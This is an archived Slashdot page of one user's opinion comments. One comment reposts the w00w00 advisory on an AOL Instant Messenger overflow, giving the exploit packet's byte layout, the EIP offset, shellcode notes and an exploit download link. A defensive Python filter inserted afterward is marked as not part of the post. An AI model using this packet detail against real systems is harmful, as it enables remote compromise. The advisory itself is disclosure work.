Slashdot Mirror


User: Bonker

Bonker's activity in the archive.

Stories: 0
Comments: 1,388

Comments · 1,388

  1. ICANN is about to lose big... on ICANN, National Registrars Still Feuding · · Score: 3, Insightful

    Firstly and foremost because it's a U.S. entity who pretends to be an international entity and the Internet quit being a U.S. entity a long time ago.

    I suspect that China will be the first to set up its own root DNS servers and start issuing non-ICANN-approved domain names, probably in competition with ICANN and Verisign. Others will soon follow. Soon every big ISP both in the U.S. will see the need to have its own root DNS server. Of course there will be some cooperation required between the different DNS roots if their customers are going to be happy. Hopefully, this new cooperation will end the monopoly ICANN has over the administration of the Internet, leaving unsportsmanlike players like Verisign standing out in left field, wondering why nobody is tossing them the ball anymore.

  2. If I couldn't feel pain... on Pain-free mice · · Score: 4, Funny

    Then my weekly trips to Madame Zora's house of punishment would be a complete waste of time and money. I *like* my pain, dammit!

  3. Philips is okay... on Philips Says Compact Discs Can't be Copyprotected · · Score: 2

    Despite having the occasionally crappy product, I've always experienced a high level of customer service from them...

    A little bit ago, my CD burner died. Not only did they RMA it, (and paid my shipping...) They sent me personal email when a new firmware revision came out for the drive later.

    Of course your mileage may vary...

  4. Re:Not true on Making It Personal · · Score: 2

    All of these people/companies/whatever have some of your sensitive personal information


    I have reasonable and fairly easy legal alternatives when dealing with companies who divulge my personal information. If a company starts distributing my personal information, such as a phone number or mailing address, then any companies who try to make use of that address are required by law to delete my entries if I contact them. If a telephone solicitor calls me and I demand they take me off their call list... they *have* to delete me, or risk civil or criminal consequences.

    The same is simply not true for non-brick and mortar businesses, and there is nothing stopping them from trading and/or selling databases for 'data-mining' purposes: Ie: Company 'A' has a database saying that you bought subscriptions to porn websites, and billed it to a credit card. Then Company 'B' has a record of your name, credit card, and the billing address, which is a P.O. box. Company 'C' has a Database with your name, phone number, and real address. A simple SQL join on those two databases allows Company 'D' to start telemarketing explicit telephone chat service to your phone number and sending pornographic junk-mail ads to your home mail box, causing your parents/wife/gay boyfriend to start wondering what the hell is going on. Heaven forbid that your job depended on being 'morally upstanding', (such as a school teacher, etc...) and the knowledge that you get porn ads at your home started to get around.

    This is an extreme example, but it shows how insidious this stuff really can be. Now this same example can be applied to brick and mortar businesses, but I don't like giving information to them, either, just for this reason.

  5. Personalization won't work until Spam is dead... on Making It Personal · · Score: 5, Insightful

    I very firmly believe this.

    I *want* sites to remember who I am and tailor their content to suit my needs and wants, but for every company who goes under and sells a database to a data-mining company or a spamco, I grow a little more uncomfortable. I just don't feel comfortable giving information that personally identifies me and allows them to track me when I know that the only thing that stands between that information and the wolves is that given dot-com's bottom line.

    Let's be honest here... Who expected any of the dot-coms to fail? Even VA-Linux is in chapter 11, aren't they? If they do go under, won't Slashdot's entire database full of opinions, email addresses, etc, be up for grabs at the asset auction? I hope this never happens, but it's a possibility.

    Until spamming is a thing of the past and data-mining is illegal or so uncommon that nobody does it any more, then personalization just won't work in a big way.

  6. Re:MAN is a great idea on Chicago Proposes MAN (Metropolitan Area Network) · · Score: 4, Interesting

    The thing is that this will happen in only 1 or 2 cities before these 'dark fiber' networks will 'become' the internet by default.

    Let's put it this way. Let's say your business lives in a large city that has a ubiquitous network like this. All your customers have cheap routers, and most of them are in the city. Will you pay an ISP for connectivity to these customers if you didn't need any more?

    If you're a network or communications intensive business, where are you going to move your business after hearing about this?

    If City 'A' is doing it, and getting business, how long will it be before City 'B' picks up the slack to try to keep businesses from leaving?

    It's a bit of a watershed, like electrical wiring and phone wiring was in the early part of the 20th century. It's not going to happen overnight, but once it does, you can bet that it will become a civics project in *every* city in just a few years, and will start interconnecting.

  7. Public Ownership of the Infrastructure... on Chicago Proposes MAN (Metropolitan Area Network) · · Score: 5, Interesting

    I see this as the way the net is going to go. It's too much like the road and highway system rather than the electrical system or TV delivery system like cable or DSS.

    People go 'to and fro' on the internet and don't necessarily turn to one provider for the majority of the service like they do for other utilities. Sure you can use pay-routes to get online, (ISPs) just as you can use toll-roads and turnpikes. The most-used routes to get online will probably be supported via tax dollars in the near to medium future.

    This has up and down sides. The up side is that public ownership of the internet will mean that it will be subject to more stringent quality controls and pricing regulation. The down-side is that any public resource is inevitably over-used and abused. It will also be more subject to content regulation if it's truly perceived as a 'community' resource.

  8. Baked Slashdot on Review: The Linux Cookbook · · Score: 5, Funny

    Ingredients

    1 Cluster of Linux Webservers

    1 Instance of Slashcode

    1 DB of your choice

    3 Intelligent Posters

    38 Whiny karma-whores, who post frequently and then complain when their 'me too' style posts are modded down.

    493 Moderators who never follow the guidelines, even if they've ever bothered to read them.

    roughly 400,000 Trolls, flamers, evangelists, ASCII artists, Katz-bashers, goat-sex linkers, Taco-haters, Microsoft-5uXX0r's and other assorted losers.

    Instructions:

    Combine listed ingredients in any given environment, heating with a steady stream of press releases from Apple, Microsoft, VA-Linux, the EFF, or the RIAA/MPAA. You can cull these press releases directly from CNet, Wired, Salon, ZDNet, or CNN if you don't have any. Once brought to a roiling boil, let bake under its own heat for as long as you can stand.

    Serve chilled, with white wine and flava beans. Serves 2

  9. Hmmm... let's look at the stats... on CD/DVD Manufacturers To Support Windows Media · · Score: 4, Insightful

    There are gigs and gigs of both pirate and legitimate divx3 and 4 videos out there to be had on IRC, Usenet, FT, and Gnutella.

    The only ones who use WMV are corporate entities who don't have anything good to encode anyway...

    *sigh*

  10. You can't have your cake... on Is CD Copy Protection Illegal? · · Score: 2, Redundant

    The 'blank media' tax has been touted in every country it's been implemented in as a way to pay publishers and artists for the perceived costs of media copying, be it fair use or piracy.

    In the U.S., the media companies get a large piece of that fee.

    That they want the right to collect both this fee *and* implement copy controls is what is being questioned here.

    Personally, I think it should boil down to one or the other. Pay the tax or pay for copy protected CDs. Not that either is really effective, but...

    Hopefully, Boucher will raise a large enough stink over this that it will actually cause some changes. Not likely, but there's always hope...

  11. Re:we need separate phone lines on Judge Upholds FBI Keyboard Sniffing · · Score: 2

    I can't wait to see some secret cables being dug and laid by freedom-loving people.

    Contractor: Hey, boss. I hit some sort of electrical cable at two feet.

    Foreman: Was it flagged?

    Contractor: Uhhh... no. All the flags for telco, electric and cable are over there. *Points*

    Foreman: Keep digging.

    Seriously, if this sort of thing could even take off, it will be via wireless connections.

  12. Re:are you sure that's lindows? on LindowsOS Marches On · · Score: 4, Insightful

    looks to me like win2k + object desktop.

    That, of course, is the ultimate goal.

    If they can truly sell their product as a 'Windows replacement' rather than just a highly tweaked Linux distro, they'll be able to do some business in the Windows Desktop market.

    Of course, there were some pretty glaring problems in the screen shots, such as the missing text on the IE buttons. This would be enough to upset people I've done tech support for:

    "But it's supposed to say 'Mail'! Why does it say 'Mai'?!"

    But, all in all, I've yet to see so clean a Wine screenshot.

    Good luck guys. You're starting with both feet in the gutter, especially with the lawsuit, but I think you might actually have a chance.

  13. Violence is okay, but not sex? on Banning Violent Arcade Games Unconstitutional · · Score: 4, Insightful

    This boggles the mind. Of course I'm very happy that the banning of video games has been declared unconstitutional, but the Supreme Court has very typically put sex in a different category, saying that communities can ban sexual displays and businesses based on 'community standards'.

    In my mind, it's not permissible to ban either, but I think it's more appropriate to filter violence than sex. A lot of people don't agree with me, but you'd think that if you can't ban one, then you shouldn't be able to ban the other.

  14. Re:Obviously a Hoax on Ethernet Over Assorted Materials · · Score: 2

    Well, maybe with a name like Hugh Barrass, he's got a lot to prove. Hopefully, he's proved it well, since 'last mile' solutions are also often 'peer to peer' solutions. If you can run 10 megabit over baling wire, what's to stop you from buying a cheapass router and joining the 'real' internet?

  15. Uhhh... wait a second... on U.S. Penalizes Ukraine for Abetting 'Piracy' · · Score: 5, Insightful

    Sayeth Gilmore...

    Next thing we'll have telephone answering machines recording what phone numbers people are calling from....video libraries recording who borrowed each book and when.....Internet ads that track and record who saw them...hotel room doors that record every time each person goes in or out...cellphones that report every move we make to the authorities...tollbooths that record every car that goes through them... guards in every airport demanding to see 'our papers' before we are permitted to travel in our own country...


    Hmmm... Caller ID machines, Doubleclick.net, and Electronic, DB controlled locks at hotels and Post 9-11 'random checks' at airports.

    Gilmore's being sarcastic, isn't he?

    Remember that the U.S. stopped being 'Of the people, for the people' a long time ago. It's been 'Of the corporate interest, for the corporate interest' for quite a while... at least since the Vietnam War, (The Johnsons had a significant stake in Bell Helicopter, which profited outrageously from the war) and probably before, but I'm not a good enough history student to tell you how far back.

    I know a 'Sherman Act' would sure as hell never make it out of committee in today's congress.

    Well, when it gets too repressive, now I know where I can go. They speak Russian in the Ukraine, right?

  16. Speed of OOP... on Can OO Programming Solve Engineering Problems? · · Score: 2

    Remember that OO code tends to compile into slower and larger executables than structured code. This is not always the case, and optimizing compilers can do a great deal to mitigate this, but the fact of the matter is that OO code was developed to give coders more power and shorter development times.

    Most of the engineering problems that I've ever seen solved in code are math intensive. One such problem was calculating the drag on a certain aircraft wing. If I remember correctly, the coder who was showing me her code indicated that the math involved broke down into a repetitious series of a few hundred cross-section integrations. These equations had to be solved for several hundred thousand cross sections to get a final result and a chart. At the time ('91) there was no 3d model, and the calculations were being conducted on a desktop computer. As you can imagine, it took a very.. very long time. One of the people I was with asked her what she was doing her math in.

    C. C++ had too much overhead, she complained, and the C compiler she was using was slightly faster than Pascal or Fortran. She was very seriously considering trying to translate her equations to register-based assembler code to speed up the process.

    If you have an engineering problem, and you're happy with the results you get from a functional language, it's probably not worth the time you'll lose from switching to an OO language.

    If you

  17. I've thought about trying a water cooler... on Power Water Cooling Kits · · Score: 3, Funny

    But the Water Still's least expensive cooler runs around $169. That model doesn't even have 'hot and cold' options. It'd be cheaper just to keep my bottled water in the refrigerator.

    Seriously, I've often considered water cooling in my Athlon system, but every time I decide to go ahead and order it, the night before I place the order, I have a horrible nightmare about sparks and electrical fire leaping up out of my computer from where the water-line broke.

  18. Re:Molly Star Racer on CGI About to Boom In Hollywood · · Score: 2

    Why can't they make PC games like this? I mean- with 3d graphic movement and cartoon drawing styles? I guess the more relevant question is 'why won't they'...

    Graphics overhead for the most part. The algorithms for flat-shaded 3d rendering have been around for a while, but the most efficient algorithm I know of requires some complex math on a Z-buffer render and brightness render, requiring 3x overhead.

    There are some quake 3 models out there that are designed to be flat-rendered, but again, put a *lot* of stress on the GPU you're rendering Quake with.

    Now, that said, this *is* about to start showing up in video games. The last screenshots distributed for the new Zelda game indicated that it would be a very cartoony, almost anime-style flat-rendered game. Whether or not that will still be the case has yet to be seen.

  19. CGI killing traditional animation? on CGI About to Boom In Hollywood · · Score: 5, Insightful

    "I think CGI is starting to phase out traditional animation," Swallow said. "But I think that is very much because of a generational divide. For a generation that is used to seeing these kind of digital images in video games, this is what they start to expect."

    Hmmm... Apparently these guys are talking about Dizney and Dizney alone. The animation houses in Japan have done a great deal to convert over to digital CG production without sacrificing the look of traditional animation.

    Take a good, close look at 'Love Hina', 'Excel Saga', or any newer anime and notice that the cels have all been 'painted' in Photoshop. On some of the closeup shots, you can make out typical Photoshop resizing residue and common filter effects.

    CG may be killing the fatiguing process of 'pencil-paint-photograph', but not traditional animation.

  20. Molly Star Racer on CGI About to Boom In Hollywood · · Score: 4, Informative

    Is an Anime-style cartoon from Sav! The World productions, which is French. (So anime-inspired that it's even got a JPop soundtrack) It's entirely CG, although it's flat-shaded so that it looks like traditional cel animation, albeit with spectacular effects and attention to detail. It looks neat, but will cost about $300,000 per episode to produce.

    You can see an Mpeg format trailer here:

    http://www.savtheworld.com/

  21. NT Bugtraq writeup on AOL Instant Messenger Remote Hole · · Score: -1, Redundant

    AOL Instant Messenger advisory
    w00w00! http://www.w00w00.org

    Author: Matt Conover (shok@dataforce.net)
    Contributors: nocarrier, napster, and w00w00 collectively

    PRELUDE

    Happy w00year! It has been a while, friends, but w00w00 is still going
    strong! w00w00 is over three years old now and still boasts the title
    of the world's largest non-profit security team. One thing remains
    true about the world of w00w00, though: we love to shake things up.

    We'd like to take a moment and make an important point. Due to
    unfortunate circumstances, the environment of the security industry
    has changed for the worse. Most major vendors and security companies
    have all switched their policies to limited disclosure, leaving the
    end users still vulnerable to serious software flaws. Big corporate
    monopolists: 1, end-users cornered into using second-rate software: 0.
    Why? Two big reasons: the DMCA and using patriotism as an excuse to
    avoid disclosing vulnerabilities.

    First, the Digital Millennium Copyright Act affects circumvention of
    anti-piracy mechanisms and reverse engineering. If a product is
    released in binary form only (i.e., AOL) to protect its technologies
    and one attempts to reverse engineer the file, it's a violation of
    the DMCA. It's no question who the lobbyists behind this law were:
    the big corporations. Not surprisingly, AOL Time Warner was one of
    the DMCA's biggest supporters. Find out more information about the
    DMCA at http://www.anti-dmca.org.

    Second, Microsoft has "decried" information anarchy. Many major
    security companies have followed suit and the rest just bent to the
    pressure. However, blaming security research teams, such as w00w00,
    for releasing information on vulnerabilities is a cop-out. Whether or
    not security research teams release information on vulnerabilities, it
    doesn't change the fact that the vendor produced insecure software.
    Vulnerabilities are still exploited in the same way they were by the
    Internet Worm 13 years ago. Further, one can reasonably assume that a
    fair number of hackers are exploiting unpublished vulnerabilities.
    By only silently updating products, computer users are unknowingly left
    vulnerable.

    DESCRIPTION

    AOL Instant Messenger (AIM) has a major security vulnerability in the
    latest stable (4.7.2480) and beta (4.8.2616) Windows versions. This
    vulnerability will allow remote penetration of the victim's system
    without any indication as to who performed the attack. There is no
    opportunity to refuse the request. This does not affect the
    non-Windows versions, because the non-Windows versions currently do
    not yet support the feature that this vulnerability occurs in.

    This particular vulnerability results from an overflow in the code
    that parses a game request. The actual overflow appears to be in the
    parsing of TLV type 0x2711. This may be more generic and exploitable
    through other means, but AOL has not released enough information about
    their protocol for us to be able to determine that. Robbie Saunders'
    email yesterday should be enough of a hint which direction to look in.

    We contacted the AOL Instant Messenger group but never received a
    response. Normally we would be inclined to provide a fix, but it is
    illegal to reverse engineer the AIM executable (DMCA and AIM's license
    agreement to thank), so we are unable to provide a patch which will
    modify it. Instead, we recommend Robbie Saunders' AIM Filter
    (http://www.ssnbc.com/wiz/) to protect yourselves.

    IMPLICATIONS

    AOL Instant Messenger (http://www.aim.com) has over 100 million users.
    We think that deserves repeating: 100 million users. Almost all of
    these users are Windows users and directly vulnerable to this.

    The first implication is that AOL should feel the weight of
    responsibility and employ better software development practices. The
    developers of a product with so many users should be much more
    cautious and avoid overbloating with a multitude of features they
    didn't have time to properly test in the first place.

    Overall, though, the implications of this vulnerability are huge and
    leave the door wide open for a worm not unlike those that Microsoft
    (*cough* corporate monopoly *cough*) Outlook, IIS, et al. have all had
    (Melissa, ILOVEYOU, CodeRed, nimda, etc.). An exploit could easily be
    amended to download itself off the web, determine the buddies of the
    victim, and then attack them also. Given the general nature of social
    networks and how they are structured, we predict that it wouldn't take
    long for such an attack to propagate.

    To top everything off, the particular overflow described supra is
    relatively simple to exploit. The payload can be several thousand bytes
    long, which leaves lots of room for creative shellcode. In addition,
    the shellcode can have null bytes in it, as long as the shellcode is
    located after the offset to EIP in the shellcode. That is, the offset
    to EIP is 1723 bytes into TLV type 0x2711. So if the shellcode is
    located after offset 1726, null bytes can be left in.

    EXPLOIT

    The exploit, w00aimexp, is too big (1000+ lines) to include here, but
    it can be downloaded at http://www.w00w00.org/files/w00aimexp.tgz. The
    files can be viewed online at http://www.w00w00.org/files/w00aimexp/.

    This is the exploit packet generated by w00aimexp (without
    USE_FULL_SIZE defined):

    FLAP header (6 bytes)
    [\x2a] '*' (magic number)
    [\x02] channel (data)
    [\x00\x11] seqnum number
    [\x07\x87] packet length (1927 bytes)

    SNAC header (10 bytes)
    [\x00\x04] SNAC family (message)
    [\x00\x06] SNAC type (outgoing message)
    [\x00\x00] SNAC flags (none)
    [\x00\x00\x00\x09] SNAC ID

    [\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie

    [\x00\x02] SNAC channel (data)

    [\x0c] victim screen name length
    [\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX] victim screen name

    Now a set of TLV data types. There is a base container, type 0x05,
    that contains everything else. Inside of this are several smaller
    containers, with each TLV type following immediately after the
    previous. If those are misaligned, you'll receive a "busted SNAC
    payload" error.

    [\x00\x05] TLV type (0x05)
    [\x07\x62] TLV length (1890 bytes)

    [\x00\x00] cookie marker
    [\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie

    Capability used to exploit this libfaim calls it (SAVESTOCKS):
    [\x09\x46\x13\x47\x4c\x7f\x11\xd1\x82\x22\x44\x45\x53\x54\x00\x00]

    [\x00\x0a] TLV type (0x0a)
    [\x00\x02] TLV length (2 bytes)
    [\x00\x01] TLV data

    [\x00\x0f] TLV type (0x0f)
    [\x00\x00] TLV length (0)

    [\x00\x0e] TLV type (0x0e)
    [\x00\x02] TLV length (2 bytes)
    ["en"] TLV data (language)

    [\x00\x0d] TLV type (0x0d)
    [\x00\x08] TLV length (8 bytes)
    ["us-ascii"] TLV data (charset)

    [\x00\x0c] TLV type (0x0d)
    [\x00\x06] TLV length (6 bytes)
    ["w00w00"] TLV data (game's name?)

    [\x00\x03] TLV type (0x03)
    [\x00\x04] TLV length (4 bytes)
    [\x40\xa3\x1e\x4f]

    [\x00\x05] TLV type (0x05)
    [\x00\x02] TLV length (2 bytes)
    [\x14\x46]

    [\x00\x07] TLV type (0x07)
    [\x00\x4d] TLV length (77 bytes)
    ["aim:AddGame?name=w00w00&go1st=true&multiplayer=true&url=http://www.w00w00.org"]

    [\x27\x11] TLV type (0x2711)
    [\x06\xbf] TLV length (22 + length of our shellcode = 1727 bytes)
    [\x00\x00\x02\x00\x05\x07\x4c\x7f\x11\xd1\x82\x22\x44\x45\x53
    \x54\x00\x00\x00\x0b\x00\x09 + shellcode starts here]

    References:
    Robbie Saunders
    Evan Brewer
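
The FLAP/SNAC/TLV layout listed in the advisory above can be checked mechanically on the receiving side. This is an added example, not part of the original post and not w00w00's or AOL's code: a Python filter that walks that layout with a bounds check on every declared length and flags an oversized TLV 0x2711. The 256-byte limit, the function names and the zero-filled sample frames are assumptions made for illustration.

```python
import struct

FLAP_MAGIC = 0x2A
GAME_TLV = 0x2711           # TLV type the advisory names as the overflow site
MAX_GAME_TLV_LEN = 256      # assumed policy limit; the advisory gives no safe size
FIXED_IN_TLV5 = 2 + 8 + 16  # cookie marker + cookie + capability, per the layout


class Malformed(ValueError):
    """A declared length points outside the bytes actually present."""


def take(buf, off, n, what):
    # Single choke point for every read: never slice past the container.
    if n < 0 or off + n > len(buf):
        raise Malformed(f"{what}: need {n} bytes, {len(buf) - off} left")
    return buf[off:off + n], off + n


def walk_tlvs(buf):
    """Yield (type, value) for back-to-back TLVs with 16-bit big-endian type/length."""
    off = 0
    while off < len(buf):
        hdr, off = take(buf, off, 4, "TLV header")
        tlv_type, length = struct.unpack(">HH", hdr)
        value, off = take(buf, off, length, f"TLV 0x{tlv_type:04x} value")
        yield tlv_type, value


def inspect_frame(frame):
    """Return a list of findings for one FLAP frame; an empty list means no flag."""
    findings = []
    try:
        hdr, off = take(frame, 0, 6, "FLAP header")
        magic, channel, _seq, flap_len = struct.unpack(">BBHH", hdr)
        if magic != FLAP_MAGIC:
            raise Malformed("FLAP magic is not 0x2a")
        if flap_len != len(frame) - 6:
            raise Malformed(f"FLAP length {flap_len} != payload {len(frame) - 6}")
        snac, off = take(frame, off, 10, "SNAC header")
        family, subtype, _flags, _snac_id = struct.unpack(">HHHI", snac)
        if channel != 0x02 or (family, subtype) != (0x0004, 0x0006):
            return findings   # only the message layout shown in the post is handled
        _, off = take(frame, off, 8 + 2, "cookie and SNAC channel")
        name_len, off = take(frame, off, 1, "screen name length")
        _, off = take(frame, off, name_len[0], "screen name")
        for tlv_type, value in walk_tlvs(frame[off:]):
            if tlv_type != 0x0005:
                continue
            _, inner = take(value, 0, FIXED_IN_TLV5, "TLV 0x05 fixed fields")
            for sub_type, sub_value in walk_tlvs(value[inner:]):
                if sub_type == GAME_TLV and len(sub_value) > MAX_GAME_TLV_LEN:
                    findings.append(
                        f"oversized TLV 0x2711: {len(sub_value)} bytes "
                        f"(limit {MAX_GAME_TLV_LEN})")
    except Malformed as exc:
        findings.append(f"malformed: {exc}")
    return findings


def sample_frame(game_tlv_len, name=b"examplename1"):
    """Constructed test input in the post's layout; every payload byte is zero."""
    def tlv(tlv_type, value):
        return struct.pack(">HH", tlv_type, len(value)) + value
    inner = bytes(FIXED_IN_TLV5) + tlv(0x000A, b"\x00\x01") + tlv(0x000E, b"en")
    inner += tlv(GAME_TLV, bytes(game_tlv_len))
    body = struct.pack(">HHHI", 0x0004, 0x0006, 0, 9) + bytes(8) + b"\x00\x02"
    body += bytes([len(name)]) + name + tlv(0x0005, inner)
    return struct.pack(">BBHH", FLAP_MAGIC, 0x02, 0x11, len(body)) + body


if __name__ == "__main__":
    for label, frame in [("22-byte TLV", sample_frame(22)),
                         ("1727-byte TLV", sample_frame(1727)),
                         ("truncated", sample_frame(22)[:-5])]:
        print(label, "->", inspect_frame(frame) or "ok")
```

A TLV whose declared length overruns its container is reported as malformed rather than read, which is the check the vulnerable parser evidently lacked.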

  22. Most of the writeup bashes the DMCA on AOL Instant Messenger Remote Hole · · Score: 5, Interesting

    The guy spends most of his time bashing the DMCA and how hard it makes it to offer patches to this sort of thing without AOL's permission:

    From the NTBugtraq letter:
    First, the Digital Millennium Copyright Act affects circumvention of anti-piracy mechanisms and reverse engineering. If a product is released in binary form only (i.e., AOL) to protect its technologies and one attempts to reverse engineer the file, it's a violation of the DMCA. It's no question who the lobbyists behind this law were: the big corporations. Not surprisingly, AOL Time Warner was one of the DMCA's biggest supporters. Find out more information about the DMCA at http://www.anti-dmca.org.

  23. Re:big bro does exist at ms.... on MS Struggles to Discredit Linux · · Score: 1

    Remember that you're talking about marketing people here. They may be more dense at MS than elsewhere, but remember that these are the same guys who invented the practice of talking about and selling software projects they can't and won't understand, let alone operate.

    I work at a company where the marketing people are responsible for coming up with and selling software concepts to customers, yet are unable to unzip screenshots of the applications they're selling or extract those screenshots from email attachments.

    These people are college educated?

  24. Re:big bro does exist at ms.... on MS Struggles to Discredit Linux · · Score: 2

    For those of you who don't know, the best way to get around Exchange's ability to track this sort of mail is a simple 'cut and paste' operation into a non-MS mail client.

    I believe that in most Exchange installations, you can also pop mail with any given non-MS pop client, Eudora, MozMail, Elm, Pine, or even Hotmail.

  25. Re:big bro does exist at ms.... on MS Struggles to Discredit Linux · · Score: 2

    PS: I used to run Exchange -- so if you think I am not tracking this message, think again. Don't forward it! And if you have forward rules that have forwarded this message, then perhaps you should think again about forwarding internal email with those rules. I want to give you folks all the information I can in a very open way. If we continue to have bad apples or careless people out there, I will not be able to help you by sending this kind of information!

    This reads a lot like 'Our Company is great and wonderful! Anyone who says different will be punished!'

    Seriously, with this kind of mentality, it's a wonder that more emails of this nature are not leaked.